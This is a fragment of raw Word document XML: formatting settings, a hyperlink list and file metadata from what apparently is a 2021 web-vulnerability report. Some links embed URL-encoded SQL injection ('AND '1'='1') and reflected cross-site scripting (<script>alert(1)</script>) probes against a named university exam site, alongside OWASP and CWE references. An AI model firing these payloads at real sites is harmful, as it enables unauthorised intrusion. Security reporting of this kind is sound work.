      </w:divBdr>
      <w:divsChild>
        <w:div w:id="815730791">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1548683687">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1687170678">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1774935730">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1065300210">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1217207990">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="752825139">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1378816881">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1473980962">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 w:id="2126075623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1662925818">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2027512687">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1182939893">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="9F9F9F"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1892573390">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google.com/url?q=https://www.dcrustedp.in/dcrustpqp3.php?examid%3D27-Jan.%2B2021%2527%2BAND%2B%25271%2527%253D%25271&amp;source=gmail-html&amp;ust=1632895987980000&amp;usg=AFQjCNEZ2NzpAziSwPDP4XXmu7oCV3PQgQ"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hyperlink" Target="https://linuxhint.com/wp-content/uploads/2020/02/3-21.png" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.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google.com/url?q=https://www.dcrustedp.in/docverify/docverify_reg_form.php&amp;source=gmail-html&amp;ust=1632895987979000&amp;usg=AFQjCNEWnEIIeFKeb-ycHkClKYx8qhH0-g" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mail-attachment.googleusercontent.com/attachment/u/0/?ui=2&amp;ik=7f660d0ab3&amp;attid=0.1&amp;permmsgid=msg-f:1712124871081824917&amp;th=17c2b07fbff19295&amp;view=att&amp;disp=inline&amp;realattid=f_ku3ome290&amp;ser=1&amp;saddbat=ANGjdJ8fACj1V-rPxt77wU_Itoia_Ejd68I0LxbWFCL-cns8RxvMPtNDl-iUln_BQEEORIIufhN1rTY-0rz2RhN18J12HDACUabF1ZmHChaWPUcN1WbZxHZi5t2SEJBcPGmG_lyLcUxOUXy2Q2lvxh9dqB6s5UlJlRM0ndl_9O2pUQgdtC1QJUq64aDK35XfNXfhWm48DaWWKNvYU5AcOAmHt-eY63rq6m8hvhaIE7u5bpJ_3uH42rGJ7IJNceM0Dq8VoIAUmpJDJ-HPd6NTkw5tqSAUPi9po-qMDIa4WmO5QvRIpZp5NbZbC6UXC8_yIv9S9vKk60OQOjI1ZVobUjONBH7rU3pburBkB6hKFIiAIoN1VxjsveC4xnO1rJFDjiKQv-qWFiTS84w1qFRvzpAnR69jcKjOx-CodZOqHle1O2H4otCBua1N39N1mosldOJA__kesdtf6sZkmvCf0yCYKHS9qxlDCiDh_EJZSR6v9_ffL7N0aAAj2Ahql6Z84SG4JK3xqXWHbbt2z7I7f-aibAUjC7PkupkTaDNSxDEoRGt6KXSaCGfLFKXulte8MJj8cFlujFjgc3iwzJJLYrEhODhGKcnRTM1AQBKDO1Fx0suM3mCzcPH3NlLape8tIEAd6rO2AcR6XYAEx2lxNbItvDlYVbCNB17rgGtfk1h7y7JFv894FO1e02I7N68" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bcinterioradhdclinic.com/adminLogin.php"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image" Target="media/image36.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://youtube.com/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=http://cwe.mitre.org/data/definitions/79.html&amp;source=gmail-html&amp;ust=1632895987979000&amp;usg=AFQjCNFfUwVhcJqU7hf3dfGq4ZUlGeeZvg" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mail-attachment.googleusercontent.com/attachment/u/0/?ui=2&amp;ik=7f660d0ab3&amp;attid=0.1&amp;permmsgid=msg-f:1712124871081824917&amp;th=17c2b07fbff19295&amp;view=att&amp;disp=inline&amp;realattid=f_ku3ome290&amp;ser=1&amp;saddbat=ANGjdJ8fACj1V-rPxt77wU_Itoia_Ejd68I0LxbWFCL-cns8RxvMPtNDl-iUln_BQEEORIIufhN1rTY-0rz2RhN18J12HDACUabF1ZmHChaWPUcN1WbZxHZi5t2SEJBcPGmG_lyLcUxOUXy2Q2lvxh9dqB6s5UlJlRM0ndl_9O2pUQgdtC1QJUq64aDK35XfNXfhWm48DaWWKNvYU5AcOAmHt-eY63rq6m8hvhaIE7u5bpJ_3uH42rGJ7IJNceM0Dq8VoIAUmpJDJ-HPd6NTkw5tqSAUPi9po-qMDIa4WmO5QvRIpZp5NbZbC6UXC8_yIv9S9vKk60OQOjI1ZVobUjONBH7rU3pburBkB6hKFIiAIoN1VxjsveC4xnO1rJFDjiKQv-qWFiTS84w1qFRvzpAnR69jcKjOx-CodZOqHle1O2H4otCBua1N39N1mosldOJA__kesdtf6sZkmvCf0yCYKHS9qxlDCiDh_EJZSR6v9_ffL7N0aAAj2Ahql6Z84SG4JK3xqXWHbbt2z7I7f-aibAUjC7PkupkTaDNSxDEoRGt6KXSaCGfLFKXulte8MJj8cFlujFjgc3iwzJJLYrEhODhGKcnRTM1AQBKDO1Fx0suM3mCzcPH3NlLape8tIEAd6rO2AcR6XYAEx2lxNbItvDlYVbCNB17rgGtfk1h7y7JFv894FO1e02I7N68" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://www.dcrustedp.in/con8/insertstudent_complete_remain.php&amp;source=gmail-html&amp;ust=1632895987980000&amp;usg=AFQjCNFequOwv9s4-1UuvUy_-mwHaApzpA"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linuxhint.com/wp-content/uploads/2020/02/2-23.png" TargetMode="External"/><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mail-attachment.googleusercontent.com/attachment/u/0/?ui=2&amp;ik=7f660d0ab3&amp;attid=0.1&amp;permmsgid=msg-f:1712124871081824917&amp;th=17c2b07fbff19295&amp;view=att&amp;disp=inline&amp;realattid=f_ku3ome290&amp;ser=1&amp;saddbat=ANGjdJ8fACj1V-rPxt77wU_Itoia_Ejd68I0LxbWFCL-cns8RxvMPtNDl-iUln_BQEEORIIufhN1rTY-0rz2RhN18J12HDACUabF1ZmHChaWPUcN1WbZxHZi5t2SEJBcPGmG_lyLcUxOUXy2Q2lvxh9dqB6s5UlJlRM0ndl_9O2pUQgdtC1QJUq64aDK35XfNXfhWm48DaWWKNvYU5AcOAmHt-eY63rq6m8hvhaIE7u5bpJ_3uH42rGJ7IJNceM0Dq8VoIAUmpJDJ-HPd6NTkw5tqSAUPi9po-qMDIa4WmO5QvRIpZp5NbZbC6UXC8_yIv9S9vKk60OQOjI1ZVobUjONBH7rU3pburBkB6hKFIiAIoN1VxjsveC4xnO1rJFDjiKQv-qWFiTS84w1qFRvzpAnR69jcKjOx-CodZOqHle1O2H4otCBua1N39N1mosldOJA__kesdtf6sZkmvCf0yCYKHS9qxlDCiDh_EJZSR6v9_ffL7N0aAAj2Ahql6Z84SG4JK3xqXWHbbt2z7I7f-aibAUjC7PkupkTaDNSxDEoRGt6KXSaCGfLFKXulte8MJj8cFlujFjgc3iwzJJLYrEhODhGKcnRTM1AQBKDO1Fx0suM3mCzcPH3NlLape8tIEAd6rO2AcR6XYAEx2lxNbItvDlYVbCNB17rgGtfk1h7y7JFv894FO1e02I7N68" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://www.dcrustedp.in/dcrustpqp2.php?examid%3D%253Cscript%253Ealert%25281%2529%253B%253C%252Fscript%253E&amp;source=gmail-html&amp;ust=1632895987979000&amp;usg=AFQjCNF6tff9ZUISNqkvmI_12Gg8imNNJ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linuxhint.com/wp-content/uploads/2020/02/1-22.png" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://www.dcrustedp.in/dcrustpqp2.php?examid%3D10-2&amp;source=gmail-html&amp;ust=1632895987980000&amp;usg=AFQjCNGFP6OLotZeMsoylwtrn1TmVAwkDA" TargetMode="Externa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hyperlink" Target="https://osintframework.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google.com/url?q=https://www.dcrustedp.in/dcrustpqp3.php?examid%3D%253C%252Fh1%253E%253Cscript%253Ealert%25281%2529%253B%253C%252Fscript%253E%253Ch1%253E&amp;source=gmail-html&amp;ust=1632895987979000&amp;usg=AFQjCNFQCZTvSerzCJ7Nn2RcRaqeADtXkA" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html&amp;source=gmail-html&amp;ust=1632895987980000&amp;usg=AFQjCNGKdkbpfNarkh1PuJmRxKa5EoLZbQ"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jpg"/><Relationship Id="rId10"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linuxhint.com/wp-content/uploads/2020/02/4-22.png" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.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mail-attachment.googleusercontent.com/attachment/u/0/?ui=2&amp;ik=7f660d0ab3&amp;attid=0.1&amp;permmsgid=msg-f:1712124871081824917&amp;th=17c2b07fbff19295&amp;view=att&amp;disp=inline&amp;realattid=f_ku3ome290&amp;ser=1&amp;saddbat=ANGjdJ8fACj1V-rPxt77wU_Itoia_Ejd68I0LxbWFCL-cns8RxvMPtNDl-iUln_BQEEORIIufhN1rTY-0rz2RhN18J12HDACUabF1ZmHChaWPUcN1WbZxHZi5t2SEJBcPGmG_lyLcUxOUXy2Q2lvxh9dqB6s5UlJlRM0ndl_9O2pUQgdtC1QJUq64aDK35XfNXfhWm48DaWWKNvYU5AcOAmHt-eY63rq6m8hvhaIE7u5bpJ_3uH42rGJ7IJNceM0Dq8VoIAUmpJDJ-HPd6NTkw5tqSAUPi9po-qMDIa4WmO5QvRIpZp5NbZbC6UXC8_yIv9S9vKk60OQOjI1ZVobUjONBH7rU3pburBkB6hKFIiAIoN1VxjsveC4xnO1rJFDjiKQv-qWFiTS84w1qFRvzpAnR69jcKjOx-CodZOqHle1O2H4otCBua1N39N1mosldOJA__kesdtf6sZkmvCf0yCYKHS9qxlDCiDh_EJZSR6v9_ffL7N0aAAj2Ahql6Z84SG4JK3xqXWHbbt2z7I7f-aibAUjC7PkupkTaDNSxDEoRGt6KXSaCGfLFKXulte8MJj8cFlujFjgc3iwzJJLYrEhODhGKcnRTM1AQBKDO1Fx0suM3mCzcPH3NlLape8tIEAd6rO2AcR6XYAEx2lxNbItvDlYVbCNB17rgGtfk1h7y7JFv894FO1e02I7N68" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=http://projects.webappsec.org/Cross-Site-Scripting&amp;source=gmail-html&amp;ust=1632895987979000&amp;usg=AFQjCNGpTXpSSxahWq6wL90LXhdoCc_hgg"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33</Pages>
  <Words>3327</Words>
  <Characters>18964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i2v</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>i2v</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2021-12-25T16:32:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-25T13:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-26T08:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>